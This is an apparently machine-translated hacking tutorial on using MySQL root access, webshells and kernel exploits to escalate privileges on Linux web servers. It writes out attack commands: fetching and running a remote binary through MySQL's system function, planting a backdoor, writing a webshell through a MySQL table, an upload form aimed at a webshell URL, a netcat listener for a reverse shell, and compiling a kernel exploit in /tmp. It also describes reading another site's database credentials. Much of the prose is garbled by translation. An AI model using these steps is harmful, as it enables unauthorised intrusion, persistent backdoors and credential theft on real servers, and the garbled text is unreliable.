The method of using MySQL root to extract power
The MySQL 5.x introduces a system function that executes commands that can be executed by using this function when MySQL is logged in as root, which is, of course, within the purview of the permission.
Generally we follow the usual idea, get to MySQL root password, we will connect up, create a table, and then outfile, get a Webshell, and then mention the right so. Today we'll put it another way.
According to the above method, we need to know the absolute path of the web, of course, this is not easy to find, some have sqlinjection, may be the error will be displayed, and some not necessarily. But according to my method, there is no need to go to the Web path, directly execute
Just so you can find the path to the Web, of course, our goal is not to find a Web path, put Webshell in. We're going to do other things like, download exp execution, get root permission, and then install the back door
Mysql>system wget http://www.xxx.com/xxxx;
Mysql>system chmod +x xxxx; Mysql>system./xxxx;
This is the root of the MySQL system root at this time, the rest of the matter, if opened SSH, on SSH connection, enter the user password MySQL, OK, fix.
Linux Low privilege claim
Rebound try TMP to create a good file, Shell directory horse, execute, local NC monitor online, WhoAmI, is wwwroot permissions
Can CD to the root directory superior (/var/www/virtual/), and then LS, the overall site is out, the target station did not blind the folder name, but no permission to jump in
Try tar packing, no permissions, try to pack the target station directory files separately, but the root directory conn.config is limited to the current target station readable permissions.
Try the CP target station include directory, unexpectedly can copy over, but cannot write copy not past, found the database configuration information, and then another server.
The database is backed up with a Phpspyshell first:
Check to see some configuration information and account number, but no background path and other sensitive information
The scan tool does not sweep the destination Web folder, and is estimated to have been modified
Try to mention the right Cmdshell as user or root, not directly to see Apache configuration settings, try to wget a few exp, but useless, estimated to have been patched
CP May, but does not know the specific information
Since the web does not have permissions, try MySQL to see if there is a privilege bar
CREATE TABLE Hackdn (spider BLOB); Creating table Hackdn
Insert a Word
Then back up to the target path 1.php file. Found not connected.
CP came to see, was separated by the translation character,
If you do not add ', insert
After backing up to PHP, save the following code locally as
|The code is as follows||Copy Code|
|1.HTML <form enctype= "Multipart/form-data" action= "http://www.webshell.cc/mysql_bak/1.php" method= "POST" >
<input name= "MyFile" type= "File" >
<input value= "submitted" type= "Submit" >
Simple Linux power of reference
Get the shell and get ready to claim it. First look at the Linux kernel
2.6.18-194.11.3.el5 Kernel 2010, this good CentOS release 5.5 good to mention
Then Baidu or other path to find exp,2.6.18-194 This kernel I have already collected. Upload/tmp, why upload to this directory?
Because the TMP directory can be written executable general, continue ing.
To find an extranet IP listening 12666, of course, 12666 can also be changed. I'm here to use NC monitor nc-l-n-v-P 12666
And then point your shell
The following is what happens when the connection succeeds
Then we go into the/tmp directory
Cd/tmp into the TMP directory, look at the 2.6.18-194 we uploaded earlier.
I have permission rwx, readable writable executable. If you do not have permission chmod-r 777 file name
My exp Here has been compiled, the direct execution overflow is OK./2.6.18-194 If your exp does not compile gcc-o/tmp/filename/tmp/filename. C, you can compile it yourself.
It worked.. In fact, Linux right is still very simple, the key to see there is no exp ... It's OVER!!!!!